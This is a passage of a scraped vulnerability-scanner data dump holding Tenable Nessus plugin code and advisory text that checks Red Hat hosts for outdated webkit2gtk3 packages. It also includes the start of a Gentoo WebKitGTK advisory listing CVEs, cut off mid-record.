{'reference':'webkit2gtk3-devel-2.36.7-1.el9', 'sp':'2', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9', 'sp':'2', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9', 'sp':'2', 'release':'9', 'rpm_spec_vers_cmp':TRUE}\n ]\n },\n {\n 'repo_relative_urls': [\n 'content/dist/rhel9/9/aarch64/appstream/debug',\n 'content/dist/rhel9/9/aarch64/appstream/os',\n 'content/dist/rhel9/9/aarch64/appstream/source/SRPMS',\n 'content/dist/rhel9/9/aarch64/baseos/debug',\n 'content/dist/rhel9/9/aarch64/baseos/os',\n 'content/dist/rhel9/9/aarch64/baseos/source/SRPMS',\n 'content/dist/rhel9/9/aarch64/codeready-builder/debug',\n 'content/dist/rhel9/9/aarch64/codeready-builder/os',\n 'content/dist/rhel9/9/aarch64/codeready-builder/source/SRPMS',\n 'content/dist/rhel9/9/aarch64/highavailability/debug',\n 'content/dist/rhel9/9/aarch64/highavailability/os',\n 'content/dist/rhel9/9/aarch64/highavailability/source/SRPMS',\n 'content/dist/rhel9/9/aarch64/supplementary/debug',\n 'content/dist/rhel9/9/aarch64/supplementary/os',\n 'content/dist/rhel9/9/aarch64/supplementary/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/appstream/debug',\n 'content/dist/rhel9/9/ppc64le/appstream/os',\n 'content/dist/rhel9/9/ppc64le/appstream/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/baseos/debug',\n 'content/dist/rhel9/9/ppc64le/baseos/os',\n 'content/dist/rhel9/9/ppc64le/baseos/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/codeready-builder/debug',\n 'content/dist/rhel9/9/ppc64le/codeready-builder/os',\n 'content/dist/rhel9/9/ppc64le/codeready-builder/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/highavailability/debug',\n 'content/dist/rhel9/9/ppc64le/highavailability/os',\n 'content/dist/rhel9/9/ppc64le/highavailability/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/resilientstorage/debug',\n 'content/dist/rhel9/9/ppc64le/resilientstorage/os',\n 'content/dist/rhel9/9/ppc64le/resilientstorage/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/sap-solutions/debug',\n 'content/dist/rhel9/9/ppc64le/sap-solutions/os',\n 'content/dist/rhel9/9/ppc64le/sap-solutions/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/sap/debug',\n 'content/dist/rhel9/9/ppc64le/sap/os',\n 'content/dist/rhel9/9/ppc64le/sap/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/supplementary/debug',\n 'content/dist/rhel9/9/ppc64le/supplementary/os',\n 'content/dist/rhel9/9/ppc64le/supplementary/source/SRPMS',\n 'content/dist/rhel9/9/s390x/appstream/debug',\n 'content/dist/rhel9/9/s390x/appstream/os',\n 'content/dist/rhel9/9/s390x/appstream/source/SRPMS',\n 'content/dist/rhel9/9/s390x/baseos/debug',\n 'content/dist/rhel9/9/s390x/baseos/os',\n 'content/dist/rhel9/9/s390x/baseos/source/SRPMS',\n 'content/dist/rhel9/9/s390x/codeready-builder/debug',\n 'content/dist/rhel9/9/s390x/codeready-builder/os',\n 'content/dist/rhel9/9/s390x/codeready-builder/source/SRPMS',\n 'content/dist/rhel9/9/s390x/highavailability/debug',\n 'content/dist/rhel9/9/s390x/highavailability/os',\n 'content/dist/rhel9/9/s390x/highavailability/source/SRPMS',\n 'content/dist/rhel9/9/s390x/resilientstorage/debug',\n 'content/dist/rhel9/9/s390x/resilientstorage/os',\n 'content/dist/rhel9/9/s390x/resilientstorage/source/SRPMS',\n 'content/dist/rhel9/9/s390x/sap/debug',\n 'content/dist/rhel9/9/s390x/sap/os',\n 'content/dist/rhel9/9/s390x/sap/source/SRPMS',\n 'content/dist/rhel9/9/s390x/supplementary/debug',\n 'content/dist/rhel9/9/s390x/supplementary/os',\n 'content/dist/rhel9/9/s390x/supplementary/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/appstream/debug',\n 'content/dist/rhel9/9/x86_64/appstream/os',\n 'content/dist/rhel9/9/x86_64/appstream/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/baseos/debug',\n 'content/dist/rhel9/9/x86_64/baseos/os',\n 'content/dist/rhel9/9/x86_64/baseos/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/codeready-builder/debug',\n 'content/dist/rhel9/9/x86_64/codeready-builder/os',\n 'content/dist/rhel9/9/x86_64/codeready-builder/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/highavailability/debug',\n 'content/dist/rhel9/9/x86_64/highavailability/os',\n 'content/dist/rhel9/9/x86_64/highavailability/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/nfv/debug',\n 'content/dist/rhel9/9/x86_64/nfv/os',\n 'content/dist/rhel9/9/x86_64/nfv/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/resilientstorage/debug',\n 'content/dist/rhel9/9/x86_64/resilientstorage/os',\n 'content/dist/rhel9/9/x86_64/resilientstorage/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/rt/debug',\n 'content/dist/rhel9/9/x86_64/rt/os',\n 'content/dist/rhel9/9/x86_64/rt/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/sap-solutions/debug',\n 'content/dist/rhel9/9/x86_64/sap-solutions/os',\n 'content/dist/rhel9/9/x86_64/sap-solutions/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/sap/debug',\n 'content/dist/rhel9/9/x86_64/sap/os',\n 'content/dist/rhel9/9/x86_64/sap/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/supplementary/debug',\n 'content/dist/rhel9/9/x86_64/supplementary/os',\n 'content/dist/rhel9/9/x86_64/supplementary/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'webkit2gtk3-2.36.7-1.el9', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9', 'release':'9', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n var enterprise_linux_flag = rhel_repo_urls_has_content_dist_rhel(repo_urls:repo_relative_urls);\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp']) && !enterprise_linux_flag) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T18:36:08", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2022:7704 advisory.\n\n - webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22624, CVE-2022-22628, CVE-2022-26709, CVE-2022-26710, CVE-2022-26717)\n\n - webkitgtk: Buffer overflow leading to arbitrary code execution (CVE-2022-22629)\n\n - webkitgtk: Cookie management issue leading to sensitive user information disclosure (CVE-2022-22662)\n\n - webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26700, CVE-2022-26716, CVE-2022-26719)\n\n - webkitgtk: Heap buffer overflow in WebCore::TextureMapperLayer::setContentsLayer leading to arbitrary code execution (CVE-2022-30293)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-11-09T00:00:00", "type": "nessus", "title": "RHEL 8 : webkit2gtk3 (RHSA-2022:7704)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293"], "modified": "2023-05-25T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-devel", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc-devel"], "id": "REDHAT-RHSA-2022-7704.NASL", "href": "https://www.tenable.com/plugins/nessus/167169", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2022:7704. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(167169);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/25\");\n\n script_cve_id(\n \"CVE-2022-22624\",\n \"CVE-2022-22628\",\n \"CVE-2022-22629\",\n \"CVE-2022-22662\",\n \"CVE-2022-26700\",\n \"CVE-2022-26709\",\n \"CVE-2022-26710\",\n \"CVE-2022-26716\",\n \"CVE-2022-26717\",\n \"CVE-2022-26719\",\n \"CVE-2022-30293\"\n );\n script_xref(name:\"RHSA\", value:\"2022:7704\");\n\n script_name(english:\"RHEL 8 : webkit2gtk3 (RHSA-2022:7704)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2022:7704 advisory.\n\n - webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22624, CVE-2022-22628,\n CVE-2022-26709, CVE-2022-26710, CVE-2022-26717)\n\n - webkitgtk: Buffer overflow leading to arbitrary code execution (CVE-2022-22629)\n\n - webkitgtk: Cookie management issue leading to sensitive user information disclosure (CVE-2022-22662)\n\n - webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26700, CVE-2022-26716,\n CVE-2022-26719)\n\n - webkitgtk: Heap buffer overflow in WebCore::TextureMapperLayer::setContentsLayer leading to arbitrary code\n execution (CVE-2022-30293)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-22624\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-22628\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-22629\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-22662\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-26700\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-26709\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-26710\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-26716\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-26717\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-26719\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-30293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2022:7704\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2073893\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2073896\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2073899\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2082548\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2092732\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2092733\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2092734\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2092735\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2092736\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2104787\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2104789\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30293\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-26719\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(120, 200, 416, 787, 1173);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel8/8/aarch64/appstream/debug',\n 'content/dist/rhel8/8/aarch64/appstream/os',\n 'content/dist/rhel8/8/aarch64/appstream/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/baseos/debug',\n 'content/dist/rhel8/8/aarch64/baseos/os',\n 'content/dist/rhel8/8/aarch64/baseos/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/codeready-builder/debug',\n 'content/dist/rhel8/8/aarch64/codeready-builder/os',\n 'content/dist/rhel8/8/aarch64/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/highavailability/debug',\n 'content/dist/rhel8/8/aarch64/highavailability/os',\n 'content/dist/rhel8/8/aarch64/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/supplementary/debug',\n 'content/dist/rhel8/8/aarch64/supplementary/os',\n 'content/dist/rhel8/8/aarch64/supplementary/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/appstream/debug',\n 'content/dist/rhel8/8/ppc64le/appstream/os',\n 'content/dist/rhel8/8/ppc64le/appstream/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/baseos/debug',\n 'content/dist/rhel8/8/ppc64le/baseos/os',\n 'content/dist/rhel8/8/ppc64le/baseos/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/codeready-builder/debug',\n 'content/dist/rhel8/8/ppc64le/codeready-builder/os',\n 'content/dist/rhel8/8/ppc64le/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/highavailability/debug',\n 'content/dist/rhel8/8/ppc64le/highavailability/os',\n 'content/dist/rhel8/8/ppc64le/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/resilientstorage/debug',\n 'content/dist/rhel8/8/ppc64le/resilientstorage/os',\n 'content/dist/rhel8/8/ppc64le/resilientstorage/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/sap-solutions/debug',\n 'content/dist/rhel8/8/ppc64le/sap-solutions/os',\n 'content/dist/rhel8/8/ppc64le/sap-solutions/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/sap/debug',\n 'content/dist/rhel8/8/ppc64le/sap/os',\n 'content/dist/rhel8/8/ppc64le/sap/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/supplementary/debug',\n 'content/dist/rhel8/8/ppc64le/supplementary/os',\n 'content/dist/rhel8/8/ppc64le/supplementary/source/SRPMS',\n 'content/dist/rhel8/8/s390x/appstream/debug',\n 'content/dist/rhel8/8/s390x/appstream/os',\n 'content/dist/rhel8/8/s390x/appstream/source/SRPMS',\n 'content/dist/rhel8/8/s390x/baseos/debug',\n 'content/dist/rhel8/8/s390x/baseos/os',\n 'content/dist/rhel8/8/s390x/baseos/source/SRPMS',\n 'content/dist/rhel8/8/s390x/codeready-builder/debug',\n 'content/dist/rhel8/8/s390x/codeready-builder/os',\n 'content/dist/rhel8/8/s390x/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/s390x/highavailability/debug',\n 'content/dist/rhel8/8/s390x/highavailability/os',\n 'content/dist/rhel8/8/s390x/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/s390x/resilientstorage/debug',\n 'content/dist/rhel8/8/s390x/resilientstorage/os',\n 'content/dist/rhel8/8/s390x/resilientstorage/source/SRPMS',\n 'content/dist/rhel8/8/s390x/sap/debug',\n 'content/dist/rhel8/8/s390x/sap/os',\n 'content/dist/rhel8/8/s390x/sap/source/SRPMS',\n 'content/dist/rhel8/8/s390x/supplementary/debug',\n 'content/dist/rhel8/8/s390x/supplementary/os',\n 'content/dist/rhel8/8/s390x/supplementary/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/appstream/debug',\n 'content/dist/rhel8/8/x86_64/appstream/os',\n 'content/dist/rhel8/8/x86_64/appstream/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/baseos/debug',\n 'content/dist/rhel8/8/x86_64/baseos/os',\n 'content/dist/rhel8/8/x86_64/baseos/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/codeready-builder/debug',\n 'content/dist/rhel8/8/x86_64/codeready-builder/os',\n 'content/dist/rhel8/8/x86_64/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/highavailability/debug',\n 'content/dist/rhel8/8/x86_64/highavailability/os',\n 'content/dist/rhel8/8/x86_64/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/nfv/debug',\n 'content/dist/rhel8/8/x86_64/nfv/os',\n 'content/dist/rhel8/8/x86_64/nfv/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/resilientstorage/debug',\n 'content/dist/rhel8/8/x86_64/resilientstorage/os',\n 'content/dist/rhel8/8/x86_64/resilientstorage/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/rt/debug',\n 'content/dist/rhel8/8/x86_64/rt/os',\n 'content/dist/rhel8/8/x86_64/rt/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/sap-solutions/debug',\n 'content/dist/rhel8/8/x86_64/sap-solutions/os',\n 'content/dist/rhel8/8/x86_64/sap-solutions/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/sap/debug',\n 'content/dist/rhel8/8/x86_64/sap/os',\n 'content/dist/rhel8/8/x86_64/sap/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/supplementary/debug',\n 'content/dist/rhel8/8/x86_64/supplementary/os',\n 'content/dist/rhel8/8/x86_64/supplementary/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'webkit2gtk3-2.36.7-1.el8', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el8', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el8', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el8', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-26T13:06:09", "description": "The remote host is affected by the vulnerability described in GLSA-202208-39 (WebKitGTK+: Multiple Vulnerabilities)\n\n - A validation issue was addressed with improved input sanitization. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing a maliciously crafted mail message may lead to running arbitrary javascript. (CVE-2022-22589)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22590)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may prevent Content Security Policy from being enforced. (CVE-2022-22592)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8).\n Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. (CVE-2022-22620)\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose sensitive user information. (CVE-2022-22662)\n\n - Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2294)\n\n - In WebKitGTK through 2.36.0 (and WPE WebKit), there is a heap-based buffer overflow in WebCore::TextureMapperLayer::setContentsLayer in WebCore/platform/graphics/texmap/TextureMapperLayer.cpp.\n (CVE-2022-30293)\n\n - ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2022-30293. Reason: This candidate is a duplicate of CVE-2022-30293. Notes: All CVE users should reference CVE-2022-30293 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. (CVE-2022-30294)\n\n - An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 15.6.1 and iPadOS 15.6.1, macOS Monterey 12.5.1, Safari 15.6.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2022-32893)\n\n - A use after free issue was addressed with improved memory management. (CVE-2022-22624, CVE-2022-22628, CVE-2022-26709, CVE-2022-26710, CVE-2022-26717)\n\n - A buffer overflow issue was addressed with improved memory handling. (CVE-2022-22629)\n\n - A logic issue in the handling of concurrent media was addressed with improved state handling.\n (CVE-2022-22677)\n\n - A memory corruption issue was addressed with improved state management. (CVE-2022-26700, CVE-2022-26716, CVE-2022-26719)\n\n - The issue was addressed with improved UI handling. (CVE-2022-32784)\n\n - An out-of-bounds write issue was addressed with improved input validation. (CVE-2022-32792)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-08-31T00:00:00", "type": "nessus", "title": "GLSA-202208-39 : WebKitGTK+: Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22589", "CVE-2022-22590", "CVE-2022-22592", "CVE-2022-22620", 